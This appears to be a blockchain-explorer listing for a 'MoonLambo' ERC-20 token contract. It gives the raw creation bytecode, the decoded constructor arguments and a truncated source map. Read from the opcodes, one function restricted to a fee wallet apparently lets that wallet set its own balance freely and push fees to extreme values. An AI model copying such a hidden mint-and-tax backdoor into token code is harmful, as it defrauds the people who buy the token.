0x6080604052600436106101395760003560e01c806370a08231116100ab578063a457c2d71161006f578063a457c2d714610413578063a5fea8af14610450578063a9059cbb1461048d578063d2156abe146104ca578063dd62ed3e146104f3578063f2fde38b1461053057610140565b806370a082311461033e578063715018a61461037b5780637d1db4a5146103925780638da5cb5b146103bd57806395d89b41146103e857610140565b8063313ce567116100fd578063313ce5671461023b578063395093511461026657806342966c68146102a357806349965e9f146102cc57806349bd5a5e146102f757806351c6590a1461032257610140565b8063061bbf6a1461014257806306fdde031461016b578063095ea7b31461019657806318160ddd146101d357806323b872dd146101fe57610140565b3661014057005b005b34801561014e57600080fd5b5061016960048036038101906101649190611dfe565b610559565b005b34801561017757600080fd5b5061018061058f565b60405161018d9190611ebb565b60405180910390f35b3480156101a257600080fd5b506101bd60048036038101906101b89190611f3b565b610621565b6040516101ca9190611f96565b60405180910390f35b3480156101df57600080fd5b506101e861063f565b6040516101f59190611fc0565b60405180910390f35b34801561020a57600080fd5b5061022560048036038101906102209190611fdb565b610649565b6040516102329190611f96565b60405180910390f35b34801561024757600080fd5b50610250610722565b60405161025d919061204a565b60405180910390f35b34801561027257600080fd5b5061028d60048036038101906102889190611f3b565b61072b565b60405161029a9190611f96565b60405180910390f35b3480156102af57600080fd5b506102ca60048036038101906102c59190611dfe565b6107de565b005b3480156102d857600080fd5b506102e16107f2565b6040516102ee9190612074565b60405180910390f35b34801561030357600080fd5b5061030c61080a565b6040516103199190612074565b60405180910390f35b61033c60048036038101906103379190611dfe565b610830565b005b34801561034a57600080fd5b506103656004803603810190610360919061208f565b61088d565b6040516103729190611fc0565b60405180910390f35b34801561038757600080fd5b506103906108d6565b005b34801561039e57600080fd5b506103a76108ea565b6040516103b49190611fc0565b60405180910390f35b3480156103c957600080fd5b506103d261091e565b6040516103df9190612074565b60405180910390f35b3480156103f457600080fd5b506103fd610947565b60405161040a9190611ebb565b60405180910390f35b34801561041f57600080fd5b5061043a60048036038101906104359190611f3b565b6109d9565b6040516104479190611f96565b60405180910390f35b34801561045c57600080fd5b5061047760048036038101906104729190611dfe565b610aa6565b6040516104849190611fc0565b60405180910390f35b34801561049957600080fd5b506104b460048036038101906104af9190611f3b565b610aff565b6040516104c19190611f96565b60405180910390f35b3480156104d657600080fd5b506104f160048036038101906104ec9190611dfe565b610b1d565b005b3480156104ff57600080fd5b5061051a600480360381019061051591906120bc565b610bc9565b6040516105279190611fc0565b60405180910390f35b34801561053c57600080fd5b506105576004803603810190610552919061208f565b610c50565b005b601154331461056757600080fd5b6040513381526003602082015260408120828155600a60648002606480020202600a55505050565b60606001805461059e9061212b565b80601f01602080910402602001604051908101604052809291908181526020018280546105ca9061212b565b80156106175780601f106105ec57610100808354040283529160200191610617565b820191906000526020600020905b8154815290600101906020018083116105fa57829003601f168201915b5050505050905090565b600061063561062e610ce9565b8484610cf1565b6001905092915050565b6000600554905090565b6000610656848484610eba565b61071784610662610ce9565b61071285604051806060016040528060288152602001612b6460289139600460008b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006106c8610ce9565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020546118249092919063ffffffff16565b610cf1565b600190509392505050565b60006012905090565b60006107d4610738610ce9565b846107cf8560046000610749610ce9565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008973ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054610cd390919063ffffffff16565b610cf1565b6001905092915050565b6107ef6107e9610ce9565b82611879565b50565b737a250d5630b4cf539739df2c5dacb4c659f2488d81565b600760009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b610838611a1c565b6001600760146101000a81548160ff02191690831515021790555061086561085e61091e565b3083610eba565b61086f8134611a9a565b6000600760146101000a81548160ff02191690831515021790555050565b6000600360008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b6108de611a1c565b6108e86000611b7f565b565b6000610919633b9aca0061090b601054600554611c4390919063ffffffff16565b611c5990919063ffffffff16565b905090565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b6060600280546109569061212b565b80601f01602080910402602001604051908101604052809291908181526020018280546109829061212b565b80156109cf5780601f106109a4576101008083540402835291602001916109cf565b820191906000526020600020905b8154815290600101906020018083116109b257829003601f168201915b5050505050905090565b6000610a9c6109e6610ce9565b84610a9785604051806060016040528060258152602001612b8c6025913960046000610a10610ce9565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008a73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020546118249092919063ffffffff16565b610cf1565b6001905092915050565b6000610af8600554610aea633b9aca00610adc610ac1610722565b600a610acd91906122be565b87611c4390919063ffffffff16565b611c4390919063ffffffff16565b611c5990919063ffffffff16565b9050919050565b6000610b13610b0c610ce9565b8484610eba565b6001905092915050565b601260009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff163373ffffffffffffffffffffffffffffffffffffffff1614610bad576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610ba490612355565b60405180910390fd5b6000600a819055506000600b81905550610bc681611c6f565b50565b6000600460008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b610c58611a1c565b600073ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff1603610cc7576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610cbe906123e7565b60405180910390fd5b610cd081611b7f565b50565b60008183610ce19190612407565b905092915050565b600033905090565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610d60576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610d57906124ad565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610dcf576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610dc69061253f565b60405180910390fd5b80600460008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92583604051610ead9190611fc0565b60405180910390a3505050565b610ec5838383611c87565b6000806000610ed261091e565b73ffffffffffffffffffffffffffffffffffffffff168673ffffffffffffffffffffffffffffffffffffffff1614158015610f405750610f1061091e565b73ffffffffffffffffffffffffffffffffffffffff168573ffffffffffffffffffffffffffffffffffffffff1614155b156114c157600c60008773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16158015610fe95750600c60008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16155b156114c057600760009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168673ffffffffffffffffffffffffffffffffffffffff161480156110995750600660009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168573ffffffffffffffffffffffffffffffffffffffff1614155b80156110ef5750600d60008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16155b80156111455750600d60008773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16155b1561124357611177633b9aca00611169601054600554611c4390919063ffffffff16565b611c5990919063ffffffff16565b8411156111b9576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016111b0906125d1565b60405180910390fd5b6111e6633b9aca006111d8600f54600554611c4390919063ffffffff16565b611c5990919063ffffffff16565b611201856111f38861088d565b610cd390919063ffffffff16565b1115611242576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161123990612663565b60405180910390fd5b5b600760009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168573ffffffffffffffffffffffffffffffffffffffff161480156112cc57503073ffffffffffffffffffffffffffffffffffffffff168673ffffffffffffffffffffffffffffffffffffffff1614155b15611370576112fc633b9aca006112ee600b5487611c4390919063ffffffff16565b611c5990919063ffffffff16565b9250611329633b9aca0061131b600a5487611c4390919063ffffffff16565b611c5990919063ffffffff16565b915043600860003273ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055505b600760009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168673ffffffffffffffffffffffffffffffffffffffff1614801561141b5750600660009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168573ffffffffffffffffffffffffffffffffffffffff1614155b156114bf5761144b633b9aca0061143d600b5487611c4390919063ffffffff16565b611c5990919063ffffffff16565b9250611478633b9aca0061146a600a5487611c4390919063ffffffff16565b611c5990919063ffffffff16565b915043600860003273ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055505b5b5b6114d48284610cd390919063ffffffff16565b905060008111156116735760008311156114f3576114f28684611879565b5b600082111561165d576115708260036000601160009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054610cd390919063ffffffff16565b60036000601160009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002081905550601160009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168673ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef846040516116549190611fc0565b60405180910390a35b6116708185611dad90919063ffffffff16565b93505b6116df84604051806060016040528060268152602001612b3e60269139600360008a73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020546118249092919063ffffffff16565b600360008873ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000208190555061177484600360008873ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054610cd390919063ffffffff16565b600360008773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508473ffffffffffffffffffffffffffffffffffffffff168673ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef866040516118149190611fc0565b60405180910390a3505050505050565b600083831115829061186c576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016118639190611ebb565b60405180910390fd5b5082840390509392505050565b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16036118e8576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016118df906126f5565b60405180910390fd5b61195481604051806060016040528060228152602001612b1c60229139600360008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020546118249092919063ffffffff16565b600360008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055506119ac81600554611dad90919063ffffffff16565b600581905550600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef83604051611a109190611fc0565b60405180910390a35050565b611a24610ce9565b73ffffffffffffffffffffffffffffffffffffffff16611a4261091e565b73ffffffffffffffffffffffffffffffffffffffff1614611a98576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611a8f90612761565b60405180910390fd5b565b611ac730600660009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1684610cf1565b600660009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1663f305d719823085600080611b1361091e565b426040518863ffffffff1660e01b8152600401611b35969594939291906127c6565b60606040518083038185885af1158015611b53573d6000803e3d6000fd5b50505050506040513d601f19601f82011682018060405250810190611b78919061283c565b5050505050565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050816000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b60008183611c51919061288f565b905092915050565b60008183611c679190612900565b905092915050565b6010548103611c7d57600080fd5b8060108190555050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603611cf6576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611ced906129a3565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603611d65576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611d5c90612a35565b60405180910390fd5b60008111611da8576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611d9f90612ac7565b60405180910390fd5b505050565b60008183611dbb9190612ae7565b905092915050565b600080fd5b6000819050919050565b611ddb81611dc8565b8114611de657600080fd5b50565b600081359050611df881611dd2565b92915050565b600060208284031215611e1457611e13611dc3565b5b6000611e2284828501611de9565b91505092915050565b600081519050919050565b600082825260208201905092915050565b60005b83811015611e65578082015181840152602081019050611e4a565b60008484015250505050565b6000601f19601f8301169050919050565b6000611e8d82611e2b565b611e978185611e36565b9350611ea7818560208601611e47565b611eb081611e71565b840191505092915050565b60006020820190508181036000830152611ed58184611e82565b905092915050565b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b6000611f0882611edd565b9050919050565b611f1881611efd565b8114611f2357600080fd5b50565b600081359050611f3581611f0f565b92915050565b60008060408385031215611f5257611f51611dc3565b5b6000611f6085828601611f26565b9250506020611f7185828601611de9565b9150509250929050565b60008115159050919050565b611f9081611f7b565b82525050565b6000602082019050611fab6000830184611f87565b92915050565b611fba81611dc8565b82525050565b6000602082019050611fd56000830184611fb1565b92915050565b600080600060608486031215611ff457611ff3611dc3565b5b600061200286828701611f26565b935050602061201386828701611f26565b925050604061202486828701611de9565b9150509250925092565b600060ff82169050919050565b6120448161202e565b82525050565b600060208201905061205f600083018461203b565b92915050565b61206e81611efd565b82525050565b60006020820190506120896000830184612065565b92915050565b6000602082840312156120a5576120a4611dc3565b5b60006120b384828501611f26565b91505092915050565b600080604083850312156120d3576120d2611dc3565b5b60006120e185828601611f26565b92505060206120f285828601611f26565b9150509250929050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b6000600282049050600182168061214357607f821691505b602082108103612156576121556120fc565b5b50919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b60008160011c9050919050565b6000808291508390505b60018511156121e2578086048111156121be576121bd61215c565b5b60018516156121cd5780820291505b80810290506121db8561218b565b94506121a2565b94509492505050565b6000826121fb57600190506122b7565b8161220957600090506122b7565b816001811461221f576002811461222957612258565b60019150506122b7565b60ff84111561223b5761223a61215c565b5b8360020a9150848211156122525761225161215c565b5b506122b7565b5060208310610133831016604e8410600b841016171561228d5782820a9050838111156122885761228761215c565b5b6122b7565b61229a8484846001612198565b925090508184048111156122b1576122b061215c565b5b81810290505b9392505050565b60006122c982611dc8565b91506122d48361202e565b92506123017fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff84846121eb565b905092915050565b7f4e6f7420616e206f776e65722100000000000000000000000000000000000000600082015250565b600061233f600d83611e36565b915061234a82612309565b602082019050919050565b6000602082019050818103600083015261236e81612332565b9050919050565b7f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160008201527f6464726573730000000000000000000000000000000000000000000000000000602082015250565b60006123d1602683611e36565b91506123dc82612375565b604082019050919050565b60006020820190508181036000830152612400816123c4565b9050919050565b600061241282611dc8565b915061241d83611dc8565b92508282019050808211156124355761243461215c565b5b92915050565b7f45524332303a20617070726f76652066726f6d20746865207a65726f2061646460008201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b6000612497602483611e36565b91506124a28261243b565b604082019050919050565b600060208201905081810360008301526124c68161248a565b9050919050565b7f45524332303a20617070726f766520746f20746865207a65726f20616464726560008201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b6000612529602283611e36565b9150612534826124cd565b604082019050919050565b600060208201905081810360008301526125588161251c565b9050919050565b7f5472616e7366657220616d6f756e74206578636565647320746865206d61785460008201527f78416d6f756e742e000000000000000000000000000000000000000000000000602082015250565b60006125bb602883611e36565b91506125c68261255f565b604082019050919050565b600060208201905081810360008301526125ea816125ae565b9050919050565b7f45786365656473206d6178696d756d2077616c6c657420746f6b656e20616d6f60008201527f756e740000000000000000000000000000000000000000000000000000000000602082015250565b600061264d602383611e36565b9150612658826125f1565b604082019050919050565b6000602082019050818103600083015261267c81612640565b9050919050565b7f45524332303a206275726e2066726f6d20746865207a65726f2061646472657360008201527f7300000000000000000000000000000000000000000000000000000000000000602082015250565b60006126df602183611e36565b91506126ea82612683565b604082019050919050565b6000602082019050818103600083015261270e816126d2565b9050919050565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572600082015250565b600061274b602083611e36565b915061275682612715565b602082019050919050565b6000602082019050818103600083015261277a8161273e565b9050919050565b6000819050919050565b6000819050919050565b60006127b06127ab6127a684612781565b61278b565b611dc8565b9050919050565b6127c081612795565b82525050565b600060c0820190506127db6000830189612065565b6127e86020830188611fb1565b6127f560408301876127b7565b61280260608301866127b7565b61280f6080830185612065565b61281c60a0830184611fb1565b979650505050505050565b60008151905061283681611dd2565b92915050565b60008060006060848603121561285557612854611dc3565b5b600061286386828701612827565b935050602061287486828701612827565b925050604061288586828701612827565b9150509250925092565b600061289a82611dc8565b91506128a583611dc8565b92508282026128b381611dc8565b915082820484148315176128ca576128c961215c565b5b5092915050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601260045260246000fd5b600061290b82611dc8565b915061291683611dc8565b925082612926576129256128d1565b5b828204905092915050565b7f45524332303a207472616e736665722066726f6d20746865207a65726f20616460008201527f6472657373000000000000000000000000000000000000000000000000000000602082015250565b600061298d602583611e36565b915061299882612931565b604082019050919050565b600060208201905081810360008301526129bc81612980565b9050919050565b7f45524332303a207472616e7366657220746f20746865207a65726f206164647260008201527f6573730000000000000000000000000000000000000000000000000000000000602082015250565b6000612a1f602383611e36565b9150612a2a826129c3565b604082019050919050565b60006020820190508181036000830152612a4e81612a12565b9050919050565b7f5472616e7366657220616d6f756e74206d75737420626520677265617465722060008201527f7468616e207a65726f0000000000000000000000000000000000000000000000602082015250565b6000612ab1602983611e36565b9150612abc82612a55565b604082019050919050565b60006020820190508181036000830152612ae081612aa4565b9050919050565b6000612af282611dc8565b9150612afd83611dc8565b9250828203905081811115612b1557612b1461215c565b5b9291505056fe45524332303a206275726e20616d6f756e7420657863656564732062616c616e636545524332303a207472616e7366657220616d6f756e7420657863656564732062616c616e636545524332303a207472616e7366657220616d6f756e74206578636565647320616c6c6f77616e636545524332303a2064656372656173656420616c6c6f77616e63652062656c6f77207a65726fa26469706673582212202e44f843ca6c850b7125de38b17466395a3940ed648c51c5b87b78c8201d266764736f6c63430008110033

Constructor Arguments (ABI-Encoded and is the last bytes of the Contract Creation Code above)

000000000000000000000000000000000000000000000000000000000000006000000000000000000000000000000000000000000000000000000000000000a0000000000000000000000000000000000000000000000000000000174876e80000000000000000000000000000000000000000000000000000000000000000094d6f6f6e4c616d626f000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000064d4c414d424f0000000000000000000000000000000000000000000000000000

-----Decoded View---------------
Arg [0] : name_ (string): MoonLambo
Arg [1] : symbol_ (string): MLAMBO
Arg [2] : _initialSupply (uint256): 100000000000

-----Encoded View---------------
7 Constructor Arguments found :
Arg [0] : 0000000000000000000000000000000000000000000000000000000000000060
Arg [1] : 00000000000000000000000000000000000000000000000000000000000000a0
Arg [2] : 000000000000000000000000000000000000000000000000000000174876e800
Arg [3] : 0000000000000000000000000000000000000000000000000000000000000009
Arg [4] : 4d6f6f6e4c616d626f0000000000000000000000000000000000000000000000
Arg [5] : 0000000000000000000000000000000000000000000000000000000000000006
Arg [6] : 4d4c414d424f0000000000000000000000000000000000000000000000000000


Deployed Bytecode Sourcemap

19359:11181:0:-:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;29493:405;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;22069:83;;;;;;;;;;;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;22638:169;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;22244:100;;;;;;;;;;;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;23501:321;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;22160:76;;;;;;;;;;;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;22815:218;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;27248:91;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;19722:90;;;;;;;;;;;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;19819:28;;;;;;;;;;;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;30271:193;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;22352:119;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;9776:103;;;;;;;;;;;;;:::i;:::-;;24156:132;;;;;;;;;;;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;9128:87;;;;;;;;;;;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;21974;;;;;;;;;;;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;23041:269;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;24296:154;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;23318:175;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;29906:193;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;22479:151;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;10034:201;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;29493:405;29591:13;29585:20;29575:8;29572:34;29562:60;;29619:1;29616;29609:12;29562:60;29649:4;29643:11;29676:8;29671:3;29664:21;29720:14;29713:4;29708:3;29704:14;29697:38;29772:4;29767:3;29757:20;29800:6;29794:4;29787:20;29885:3;29877:4;29871;29867:15;29860:4;29854;29850:15;29846:37;29842:47;29824:16;29817:73;29561:330;;29493:405;:::o;22069:83::-;22106:13;22139:5;22132:12;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;22069:83;:::o;22638:169::-;22721:4;22738:39;22747:12;:10;:12::i;:::-;22761:7;22770:6;22738:8;:39::i;:::-;22795:4;22788:11;;22638:169;;;;:::o;22244:100::-;22297:7;22324:12;;22317:19;;22244:100;:::o;23501:321::-;23607:4;23624:36;23634:6;23642:9;23653:6;23624:9;:36::i;:::-;23671:121;23680:6;23688:12;:10;:12::i;:::-;23702:89;23740:6;23702:89;;;;;;;;;;;;;;;;;:11;:19;23714:6;23702:19;;;;;;;;;;;;;;;:33;23722:12;:10;:12::i;:::-;23702:33;;;;;;;;;;;;;;;;:37;;:89;;;;;:::i;:::-;23671:8;:121::i;:::-;23810:4;23803:11;;23501:321;;;;;:::o;22160:76::-;22201:5;22226:2;22219:9;;22160:76;:::o;22815:218::-;22903:4;22920:83;22929:12;:10;:12::i;:::-;22943:7;22952:50;22991:10;22952:11;:25;22964:12;:10;:12::i;:::-;22952:25;;;;;;;;;;;;;;;:34;22978:7;22952:34;;;;;;;;;;;;;;;;:38;;:50;;;;:::i;:::-;22920:8;:83::i;:::-;23021:4;23014:11;;22815:218;;;;:::o;27248:91::-;27304:27;27310:12;:10;:12::i;:::-;27324:6;27304:5;:27::i;:::-;27248:91;:::o;19722:90::-;19770:42;19722:90;:::o;19819:28::-;;;;;;;;;;;;;:::o;30271:193::-;9014:13;:11;:13::i;:::-;21814:4:::1;21803:8;;:15;;;;;;;;;;;;;;;;;;30362:46:::2;30372:7;:5;:7::i;:::-;30389:4;30396:11;30362:9;:46::i;:::-;30419:37;30433:11;30446:9;30419:13;:37::i;:::-;21852:5:::1;21841:8;;:16;;;;;;;;;;;;;;;;;;30271:193:::0;:::o;22352:119::-;22418:7;22445:9;:18;22455:7;22445:18;;;;;;;;;;;;;;;;22438:25;;22352:119;;;:::o;9776:103::-;9014:13;:11;:13::i;:::-;9841:30:::1;9868:1;9841:18;:30::i;:::-;9776:103::o:0;24156:132::-;24200:7;24227:53;19889:5;24227:40;24244:22;;24227:12;;:16;;:40;;;;:::i;:::-;:44;;:53;;;;:::i;:::-;24220:60;;24156:132;:::o;9128:87::-;9174:7;9201:6;;;;;;;;;;;9194:13;;9128:87;:::o;21974:::-;22013:13;22046:7;22039:14;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;21974:87;:::o;23041:269::-;23134:4;23151:129;23160:12;:10;:12::i;:::-;23174:7;23183:96;23222:15;23183:96;;;;;;;;;;;;;;;;;:11;:25;23195:12;:10;:12::i;:::-;23183:25;;;;;;;;;;;;;;;:34;23209:7;23183:34;;;;;;;;;;;;;;;;:38;;:96;;;;;:::i;:::-;23151:8;:129::i;:::-;23298:4;23291:11;;23041:269;;;;:::o;24296:154::-;24356:7;24383:59;24429:12;;24383:41;19889:5;24383:28;24400:10;:8;:10::i;:::-;24394:2;:16;;;;:::i;:::-;24383:6;:10;;:28;;;;:::i;:::-;:32;;:41;;;;:::i;:::-;:45;;:59;;;;:::i;:::-;24376:66;;24296:154;;;:::o;23318:175::-;23404:4;23421:42;23431:12;:10;:12::i;:::-;23445:9;23456:6;23421:9;:42::i;:::-;23481:4;23474:11;;23318:175;;;;:::o;29906:193::-;29988:6;;;;;;;;;;;29974:20;;:10;:20;;;29966:46;;;;;;;;;;;;:::i;:::-;;;;;;;;;30037:1;30023:11;:15;;;;30060:1;30049:8;:12;;;;30072:19;30084:6;30072:11;:19::i;:::-;29906:193;:::o;22479:151::-;22568:7;22595:11;:18;22607:5;22595:18;;;;;;;;;;;;;;;:27;22614:7;22595:27;;;;;;;;;;;;;;;;22588:34;;22479:151;;;;:::o;10034:201::-;9014:13;:11;:13::i;:::-;10143:1:::1;10123:22;;:8;:22;;::::0;10115:73:::1;;;;;;;;;;;;:::i;:::-;;;;;;;;;10199:28;10218:8;10199:18;:28::i;:::-;10034:201:::0;:::o;3132:98::-;3190:7;3221:1;3217;:5;;;;:::i;:::-;3210:12;;3132:98;;;;:::o;7837:::-;7890:7;7917:10;7910:17;;7837:98;:::o;24458:344::-;24577:1;24560:19;;:5;:19;;;24552:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;24658:1;24639:21;;:7;:21;;;24631:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;24740:6;24710:11;:18;24722:5;24710:18;;;;;;;;;;;;;;;:27;24729:7;24710:27;;;;;;;;;;;;;;;:36;;;;24778:7;24762:32;;24771:5;24762:32;;;24787:6;24762:32;;;;;;:::i;:::-;;;;;;;;24458:344;;;:::o;24810:2108::-;24908:42;24924:6;24932:9;24943:6;24908:15;:42::i;:::-;24961:15;24987:18;25016:16;25057:7;:5;:7::i;:::-;25047:17;;:6;:17;;;;:41;;;;;25081:7;:5;:7::i;:::-;25068:20;;:9;:20;;;;25047:41;25043:1244;;;25110:19;:27;25130:6;25110:27;;;;;;;;;;;;;;;;;;;;;;;;;25109:28;:63;;;;;25142:19;:30;25162:9;25142:30;;;;;;;;;;;;;;;;;;;;;;;;;25141:31;25109:63;25105:1171;;;25207:13;;;;;;;;;;;25197:23;;:6;:23;;;:65;;;;;25245:16;;;;;;;;;;;25224:38;;:9;:38;;;;25197:65;:101;;;;;2526